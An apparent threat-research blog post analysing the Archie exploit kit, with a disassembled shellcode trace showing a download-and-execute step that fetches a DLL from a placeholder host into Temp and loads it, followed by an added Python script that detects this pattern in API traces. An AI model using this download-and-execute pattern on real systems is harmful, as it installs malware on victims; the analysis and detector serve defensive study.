We have previously described how Exploit Kits are some of the favorite techniques used by cybercriminals to install malicious software on victims' systems. The number of Exploit Kits available has experienced exponential growth in the last few years. Since Blackhole's author was arrested in 2013, the number of Exploit Kits has increased, including Neutrino, Magnitude, Nuclear, Rig and Angler.

In this blog post we discuss Archie, an Exploit Kit that was first discovered by William Metcalf. Archie is a really basic Exploit Kit that uses different exploit modules copied from the Metasploit Framework.

When the victim lands on the main page, Archie uses the PluginDetect JavaScript library to extract information about the Flash, Silverlight and Acrobat Reader versions, and sends that information to the server. It also uses the following trick to check whether or not the system is running a 64-bit version of Internet Explorer. We documented this trick in previous blog posts.

Depending on the Silverlight, Internet Explorer and Flash versions, it will try to load a different exploit module including:

Archie contains shellcode in different formats, which it passes to the Metasploit-generated exploit modules when it loads them. If we disassemble the shellcode we can see it is a basic download and execute payload.

4010bb LoadLibraryA(urlmon)
401089 VirtualAlloc(base=0 , sz=400) = 60000
4010ce GetTempPath(len=104, buf=60000) = 14
4010a7 URLDownloadToFile(http://IPADDRESS:PORT/dd, C:\users\user\Temp\e.dll)
401108 LoadLibraryA(C:\users\user\Temp\e.dll)
401114 Sleep(0x3a98)

The shellcode downloads a DLL from the webserver, writes it to Users\[Current_user]\Temp\e.dll and then loads it.

The IP address where the Archie Exploit Kit is hosted, and the piece of malware delivered, is also being used for click fraud operations.
It is related to this research published by Kimberly on the click fraud bot: http://stopmalvertising.com/malware-reports/anatomy-of-a-net-click-fraud-bot.html [no longer available]. Following is the list of hashes that we have found connecting to the same C&C:

About the Author: Jaime Blasco

Jaime Blasco is a renowned Security Researcher with broad experience in network security, malware analysis and incident response. At AT&T Cybersecurity, Jaime leads the Alien Labs Intelligence and Research team that leads the charge of researching and integrating threat intelligence into detection mechanisms. Prior to working at AT&T, Jaime was Chief Scientist at AlienVault. Prior to that, he founded a couple of startups (Eazel, Aitsec) working on web application security, source code analysis and incident response. He is based in San Francisco. Jaime's work in emerging threats and targeted attacks is frequently cited in international publications such as New York Times, BBC, Washington Post and Al Jazeera.
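As an added example (not code from the original post): a small Python triage script that parses an API trace in the layout shown for the shellcode and flags the download-then-load pattern, where a file written by URLDownloadToFile is later passed to LoadLibraryA. The sample trace is constructed from the listing in the post, with Windows path separators restored by assumption; the function names are hypothetical.

```python
import re

# Constructed sample in the "<address> <Api>(<args>)[ = <ret>]" layout of the listing.
# IPADDRESS:PORT is the post's own placeholder; path separators are an assumption.
SAMPLE_TRACE = r"""
4010bb LoadLibraryA(urlmon)
401089 VirtualAlloc(base=0 , sz=400) = 60000
4010ce GetTempPath(len=104, buf=60000) = 14
4010a7 URLDownloadToFile(http://IPADDRESS:PORT/dd, C:\users\user\Temp\e.dll)
401108 LoadLibraryA(C:\users\user\Temp\e.dll)
401114 Sleep(0x3a98)
"""

CALL_RE = re.compile(r"^\s*([0-9a-fA-F]+)\s+(\w+)\((.*)\)\s*(?:=\s*(\S+))?\s*$")


def parse_trace(text):
    """Return a list of (address, api, [args], return_value) tuples."""
    calls = []
    for line in text.splitlines():
        m = CALL_RE.match(line)
        if not m:
            continue  # skip blank or unrecognised lines
        addr, api, args, ret = m.groups()
        calls.append((int(addr, 16), api, [a.strip() for a in args.split(",")], ret))
    return calls


def find_download_and_load(calls):
    """Flag files fetched with URLDownloadToFile* and later passed to LoadLibrary*."""
    downloaded = {}  # local path (lower-cased) -> source URL
    findings = []
    for addr, api, args, _ret in calls:
        if api.startswith("URLDownloadToFile") and len(args) >= 2:
            downloaded[args[1].lower()] = args[0]
        elif api.startswith("LoadLibrary") and args and args[0].lower() in downloaded:
            path = args[0]
            findings.append({
                "url": downloaded[path.lower()],
                "path": path,
                "load_addr": hex(addr),
                "in_temp": "\\temp\\" in path.lower(),  # written under a Temp directory
            })
    return findings


if __name__ == "__main__":
    for finding in find_download_and_load(parse_trace(SAMPLE_TRACE)):
        print(finding)
```

The benign `LoadLibraryA(urlmon)` call is not flagged because its argument was never a download target; only the load of the fetched DLL is reported.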